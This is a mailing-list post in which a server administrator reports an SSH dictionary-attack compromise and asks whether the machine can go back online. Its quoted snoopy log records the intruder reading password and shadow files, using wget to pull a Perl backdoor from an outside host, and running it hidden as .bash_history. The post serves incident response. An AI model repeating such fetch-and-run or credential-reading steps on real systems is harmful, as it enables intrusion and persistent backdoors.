[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Compromised system - still ok?

Hash: SHA1

Hi everybody,

guess it was my time - this time...

Ok .. about 4 hours ago the following happened on one of my machines:
1) Somebody tried from one host ( a dictionary attack
2) He/She/It got in using the user backup (I know.. I know ..)
3) H/S/I downloaded 2 files from a geocities.com account
4) File 1 - no idea what it is or what it does - cannot find it
5) File 2 - a perl script that "claims" to be a telnet server

After taking the machine offline, I did the following:
a) locked user backup
b) removed password/interactive login from sshd (should have been done a long time ago)
c) killed the perl script running as user backup
d) find -user backup -mtime 1 > /tmp/file
e) nmap localhost for all ports
f) checked /tmp/file for "unknown files" - found /tmp/.bash_history
g) moved /tmp/.bash_history off the machine for analysis

Here is the snoopy log:
- ----
Feb 6 10:33:26 mail2 sshd[15544]: Accepted password for backup from port 38842 ssh2 Feb 6 10:33:26 mail2 sshd[22307]: (pam_unix) session opened for user backup by (uid=0)
Feb  6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb  6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb 6 10:33:41 mail2 sshd[22307]: (pam_unix) session closed for user backup Feb 6 10:57:26 mail2 sshd[1306]: Accepted keyboard-interactive/pam for backup from port 45424 ssh2 Feb 6 10:57:26 mail2 sshd[4008]: (pam_unix) session opened for user backup by (uid=0)
Feb  6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb  6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb  6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:57:35 mail2 snoopy[18242]: [backup, uid:34 sid:22447]: id
Feb 6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname - -a Feb 6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd Feb 6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]: /sbin/ifconfig Feb 6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat /etc/hosts
Feb  6 10:59:06 mail2 snoopy[26230]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb 6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p Feb 6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat shadow.bak
Feb  6 10:59:41 mail2 snoopy[31313]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p Feb 6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv jam5.pl.txt .bash_history Feb 6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history Feb 6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb  6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb  6 11:00:16 mail2 snoopy[4918]: [backup, uid:34 sid:22447]: ls -all
Feb  6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
Feb 6 11:01:20 mail2 sshd[4008]: (pam_unix) session closed for user backup
- ----

The telnetserver doesn't seem to make any entires in wtmp hence no `last` or `w` entries on the machine.
However, snoopy still sees uses from the user :)

ASAI can say H/S/I hasn't been on my machine since. The firewall didn't permit access to the port (34567) opened by the perl script and my firewall log says no access to that port before I tried it from localhost.

The machine runs a linux 2.4.27-grsec-hi woody testing
I'm considering taking it back online with a 2.4.29-grsec-hi, what do you guys think?

- - Many thanks, Peter
Version: GnuPG v1.2.4 (Darwin)


Reply to: